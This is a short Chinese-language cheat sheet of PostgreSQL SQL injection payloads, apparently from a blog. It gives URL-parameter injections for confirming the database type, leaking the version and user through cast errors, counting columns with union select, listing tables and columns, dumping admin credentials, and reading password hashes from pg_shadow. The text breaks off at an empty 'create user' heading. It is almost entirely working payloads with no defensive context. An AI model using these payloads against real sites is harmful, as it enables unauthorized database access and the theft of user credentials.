postgresql注入
1.postgresql数据库注入常用语法
判断是否为postgresql数据库
+and+1::int=1–
php?id=1+and+1::int=1–
判断数据库版本信息
+and+1=cast(version() as int)–
判断当前用户
and 1=cast(user||123 as int)
判断有多少字段
order by
union select null,null,null
union select null,user,null 判断当前用户
判断数据库版本信息
union select null,version(),null–
判断用户权限
union+select+null,current_schema(),null
判断当前数据库名称
union+select+null,current_database(),null
判断当前表名
union+select+null,relname,null from pg_stat_user_tables
读取每个表的列名
union+select+null,column_name,null+from+information_schema.columns+where+table_name=‘表名’
列字段内容
+union+select+null,name||pass,null+from+admin
查看postgresql数据库的账号密码
+union+select+null,usename||chr(124)||passwd,null+from+pg_shadow
创建用户
postgresql注入
最新推荐文章于 2023-07-10 17:05:02 发布